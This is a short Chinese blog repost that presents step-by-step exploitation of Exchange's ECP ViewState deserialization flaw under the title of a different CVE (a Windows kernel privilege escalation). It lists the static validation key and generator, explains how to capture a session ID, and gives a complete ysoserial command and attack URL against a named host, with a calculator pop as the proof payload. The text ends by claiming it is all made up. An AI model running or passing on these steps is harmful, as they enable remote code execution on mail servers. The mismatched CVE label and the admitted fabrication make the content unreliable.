CVE-2020-0668(Microsoft Windows Kernel許可權提升漏洞)
阿新 • • 發佈:2021-01-21
- 目標:mail.sync.net
1.需要四個引數,分別為:
--validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF(預設,漏洞產生原因) --validationalg = SHA1(預設,漏洞產生原因) --generator=B97B4E27(基本預設) --viewstateuserkey = ASP.NET_SessionId(手工獲取,變數,每次登陸都不一致) 獲取方式:普通賬號登入https://ip/ecp/default.aspx viewstateuserkey位於default.aspx-->Headers-->ASP.NET_SessionId中: 99566ec5-d60166d1477410aa-4576-a8b9-
2.生成序列化資料,(彈個計算器)
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c calc.exe" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="99566ec5-d60166d1477410aa-4576-a8b9-" --isdebug –islegacy
3.序列化資料url編碼:
無圖
4.構造連結並訪問:
https://mail.sync.net/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=
目標機器上彈出計算器,此處無圖, 因為上面的東西都是我瞎編的瞎編的瞎編的瞎編的瞎編的